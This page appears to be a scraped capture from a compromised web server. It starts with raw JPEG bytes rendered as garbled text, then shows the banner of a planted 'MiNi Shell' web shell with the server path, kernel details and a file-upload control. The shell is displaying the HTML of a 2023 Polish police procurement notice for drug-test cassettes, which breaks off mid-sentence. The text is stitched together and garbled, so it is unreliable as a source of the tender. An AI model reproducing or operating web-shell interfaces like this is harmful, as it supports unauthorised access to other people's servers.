JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231002/0042262701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa kaset do elektronicznych urządzeń służących do badania kierujących na zawartość środków działających podobnie do alkoholu i testów jednorazowego użytku............ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Komenda Wojewódzka Policji w Katowicach</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Wydział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270208292</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lompy 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-038</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ka.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.slaska.policja.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa kaset do elektronicznych urządzeń służących do badania kierujących na zawartość środków działających podobnie do alkoholu i testów jednorazowego użytku............ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-656bfa23-6105-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00422627</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00129271/21/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.12 Zakup i dostawa kaset do elektronicznych urządzeń służących do badania kierujących na zawartość środków działających podobnie do alkoholu i testów jednorazowego użytku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://slaska-policja.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://slaska-policja.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o u dzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl, tj.: a) Stały dostęp do sieci Internet o gwarantowanej przepustowości<br/>niemniejszejniż512 kb/s;b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ,jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;c) Zainstalowana dowolna<br/>przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0;d) Włączona obsługa JavaScript;e) Zainstalowany<br/>program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.f) Dopuszczalny format przesyłanych danych tj. plików o<br/>wielkoścido50MB w formatach: .pdf g) Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, jest w Systemie<br/>zaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu<br/>składania ofert. h)Oznaczenie czasu odbioru danych przez Platformę stanowi przypiętą do dokumentu elektronicznego datę oraz<br/>dokładny czas(hh:mm:ss), znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”. Poniżej została określona<br/>instrukcja korzystania z Platformy, tj.:a) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu. Po<br/>wprowadzeniu danych użytkownika tj. adresu e-mail oraz hasła zgłoszenie jest automatycznie akceptowane przez system.b) w<br/>zakładce „Postępowania” ,„Lista postępowań otwartych” należy wybrać niniejsze postępowanie oraz korzystając z polecenia „zgłoś<br/>się do udziału w postępowaniu” przejść do Formularza rejestracyjnego – w przypadku, gdy Wykonawca nie posiada konta na<br/>Platformie lub panelu logowania użytkownika do Systemu. c) po wypełnieniu Formularza rejestracyjnego Wykonawca otrzyma e maila informującego, że może dokonać pierwszego logowania do Platformy. Zamawiający nie ponosi odpowiedzialności za złożenie<br/>oferty w sposób niezgodny z zasadami korzystania z https://slaskapolicja. eb2b.com.pl, w szczególności za sytuację, gdy<br/>Zamawiający zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty w zakładce<br/>Pytania/Informacje”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w<br/>przedmiotowym postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 ustawy. Formaty plików<br/>wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z 09.11.2017r. w sprawie<br/>ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram interoperacyjności, minimalnych wymagań<br/>dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych. a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg).b) W celu ewentualnej<br/>kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z Zaleca się, aby komunikacja z<br/>Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza Pytania/Informacje”, nie za pośrednictwem adresu<br/>email. Informacji technicznych i weryfikacji danych oraz podpisów elektronicznych związanych z prowadzonym postępowaniem<br/>udziela Operator Platformy Zakupowej pod numerem telefonu (+48) 22 378 39 70,(+48)22 258 48 61, (+48) 22 428 19 28, e mail:helpdesk@eb2b.com.p</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest Komendant Wojewódzki Policji w<br/>Katowicach z siedzibą przy ul. J. Lompy 19, 40-038 Katowice; 2. Inspektor Ochrony Danych wykonuje swoje obowiązki w siedzibie<br/>Komendy Wojewódzkiej Policji w Katowicach, zlokalizowanej w Katowicach przy ul. J. Lompy 19, tel. 32-200-24-03, e mailiod.kwp@ka.policja.gov.pl; 3. Pani/Pana dane osobowe będą przetwarzane w celu/ celach przygotowania i przeprowadzenia<br/>postępowania o udzielenie zamówienia publicznego oraz realizacji tego zamówienia; 4. Podstawą prawną przetwarzania<br/>dotyczących Pani/Pana danych osobowych jest ustawa z dnia 11 września 2019r. Prawo zamówień publicznych(Dz.U.<br/>2022r.poz.1710), zwana w dalszej części „ustawą Pzp”; 5. Odbiorcą Pani/Pana danych osobowych może być Urząd Zamówień<br/>Publicznych, ponadto w zakresie określonym w ustawie Pzp, dane mogą być publikowane<br/>nastronieinternetowejhttp://bip.katowice.kwp.policja.gov.pl oraz innym podmiotom uprawnionym na podstawie odrębnych<br/>przepisów;6.Pani/Pana dane nie będą przekazywane do państwa trzeciego, organizacji międzynarodowej; 7. Okres przechowywania<br/>Pani/Panadanych osobowych wynika z przepisów dotyczących okresów przechowywania akt w Policji. 8. Posiada Pani/Pan prawo<br/>żądania od Administratora dostępu do danych dotyczących Pani/Pana osoby, sprostowania, ograniczenia przetwarzania i wniesienia<br/>sprzeciwu wobec przetwarzania danych osobowych w zakresie określonym przepisami prawa; 9. Ma Pani/Pan prawo wniesienia kargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych; 10. Podanie danych jest wymogiem<br/>ustawowym; 11.W przypadku niepodania danych nie będzie możliwy udział w postępowaniu o udzielenie<br/>zamówieniapublicznego;12.Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>13.Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą o ochronie danych osobowych i<br/>Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej RODO). Obowiązek<br/>poinformowania podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych osobowych spoczywa na<br/>Wykonawcy. Oświadczenie Wykonawcy o wypełnieniu obowiązków wynikających z art. 13 lub art. 14 RODO wobec osób fizycznych,<br/>od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o niniejsze zamówienie złożone w<br/>załącznikunr1 do SWZ – formularz ofertowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-2380-390/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa kaset do elektronicznego urządzenia DRUG Read – szt. 1400 zgodnie z<br/>załącznikiem nr 3 do SWZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33694000-1 - Czynniki diagnostyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">kryterium A- cena oferty brutto Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w<br/>ofertach do ceny najniższej spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/>A =Cmin/Cbad x 60 pkt<br/>gdzie:<br/>A - ilość pkt uzyskanych przez Wykonawcę<br/>Cmin - najniższa cena oferty brutto<br/>Cbad - cena brutto badanej oferty<br/>2.1.1 Wyznaczenie wartości punktów:<br/>a) ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60<br/>b) inne ważne oferty cenowe zostaną przeliczone wg powyższego wzoru<br/>c) jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>2.1.2 zasady przyznawania punktów<br/>a) Wartości liczone będą do dwóch miejsc po przecinku<br/>b) Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.<br/>2.2. kryterium B - wydłużony termin gwarancji i termin ważności. Ocena będzie dokonywana poprzez zastosowanie poniższych<br/>zasad spośród ofert niepodlegających odrzuceniu.<br/>Wykonawca może wydłużyć gwarancję i termin ważności o wartość wskazaną poniżej tj. przedłużyć minimalną gwarancję oraz termin ważności wskazany dla każdej części w formularzu cenowym o okres wskazany poniżej.<br/>Zamawiający przyzna wykonawcy następującą ilość punktów :<br/>- w przypadku przedłużenia o 12 miesięcy – 40 pkt<br/>- w przypadku przedłużenia o 9 miesięcy – 30 pkt<br/>- w przypadku przedłużenia o 6 miesięcy – 20 pkt<br/>- w przypadku przedłużenia o 3 miesiące – 10 pkt<br/>- gwarancja podstawowa wskazana w formularzu cenowym – 0 pkt.<br/>W przypadku zaoferowania innego okresu ( np. 6,5 miesiąca) niż wskazany powyżej oferta wykonawcy zostanie przeliczona z<br/>zaokrągleniem w dół (czyli 6 miesięcy). W przypadku braku deklaracji co do przedłużenia gwarancji Zmawiający uzna, że<br/>Wykonawca zaoferował minimalny wymagany okres gwarancji oraz termin ważności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużony termin gwarancji i termin ważności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa kaset do elektronicznego urządzenia do ABBOT SOTOXA – szt. 75 zgodnie<br/>z załącznikiem nr 3 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33694000-1 - Czynniki diagnostyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">kryterium A- cena oferty brutto Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w<br/>ofertach do ceny najniższej spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/>A =Cmin/Cbad x 60 pkt<br/>gdzie:<br/>A - ilość pkt uzyskanych przez Wykonawcę<br/>Cmin - najniższa cena oferty brutto<br/>Cbad - cena brutto badanej oferty<br/>2.1.1 Wyznaczenie wartości punktów:<br/>a) ważna oferta z najniższą ceną otrzyma maksymalną liczbę punktów tj. 60<br/>b) inne ważne oferty cenowe zostaną przeliczone wg powyższego wzoru<br/>c) jeżeli ważne oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>2.1.2 zasady przyznawania punktów<br/>a) Wartości liczone będą do dwóch miejsc po przecinku<br/>b) Otrzymana tak wartość podstawiona zostanie do wzoru na wyliczenie ogólnej liczby punktów.<br/>2.2. kryterium B - wydłużony termin gwarancji i termin ważności. Ocena będzie dokonywana poprzez zastosowanie poniższych<br/>zasad spośród ofert niepodlegających odrzuceniu.<br/>Wykonawca może wydłużyć gwarancję i termin ważności o wartość wskazaną poniżej tj. przedłużyć minimalną gwarancję oraz termin ważności wskazany dla każdej części w formularzu cenowym o okres wskazany poniżej.<br/>Zamawiający przyzna wykonawcy następującą ilość punktów :<br/>- w przypadku przedłużenia o 12 miesięcy – 40 pkt<br/>- w przypadku przedłużenia o 9 miesięcy – 30 pkt<br/>- w przypadku przedłużenia o 6 miesięcy – 20 pkt<br/>- w przypadku przedłużenia o 3 miesiące – 10 pkt<br/>- gwarancja podstawowa wskazana w formularzu cenowym – 0 pkt.<br/>W przypadku zaoferowania innego okresu ( np. 6,5 miesiąca) niż wskazany powyżej oferta wykonawcy zostanie przeliczona z<br/>zaokrągleniem w dół (czyli 6 miesięcy). W przypadku braku deklaracji co do przedłużenia gwarancji Zmawiający uzna, że<br/>Wykonawca zaoferował minimalny wymagany okres gwarancji oraz termin ważności.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużony termin gwarancji i termin ważności.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa testów jednorazowego użytku do wstępnego wykrywania w ślinie środków<br/>działających podobnie do alkoholu: – szt. 230 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33694000-1 - Czynniki diagnostyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zakup i dostawa Testów jednorazowego użytku do wstępnego wykrywania w ślinie środków działających podobnie do<br/>alkoholu: 100 szt.<br/>•	Zamawiający zastrzega sobie prawo skorzystania z opcji na podstawie art. 441 ust. 1 ustawy Pzp. <br/>•	Przedmiotem zamówienia w ramach prawa opcji jest realizacja dostaw poszczególnego asortymentu, zgodnie z ilościami wskazanymi w Sekcji IV pkt 1.2 ppkt a). <br/>•	Zamawiający zastrzega, iż wykonanie części zamówienia w ramach prawa opcji jest uprawnieniem, a nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, skorzystać z nie-go w mniejszym zakresie niż określony w Sekcji IV pkt 1.2 ppkt a) SWZ, a Wykonawcy nie przysługują z te-go tytułu żadne roszczenia. <br/>•	Zamawiając przewiduje możliwość skorzystania z prawa opcji w terminie obowiązywania umowy. <br/>•	W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji, na warunkach określonych w umowie. <br/>•	Zamawiający poinformuje Wykonawcę o skorzystaniu z prawa opcji z minimum 7-dniowym wyprzedzeniem na piśmie. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">kryterium A- cena oferty brutto Ocena będzie dokonywana poprzez porównanie cen brutto zawartych w<br/>ofertach do ceny najniższej spośród ofert niepodlegających odrzuceniu. Punkty za kryterium będą obliczone wg wzoru:<br/>A =Cmin/Cbad x 60 pkt<br/>gdzie:<br/>A - ilość pkt uzyskanych przez Wykonawcę<br/>Cmin - 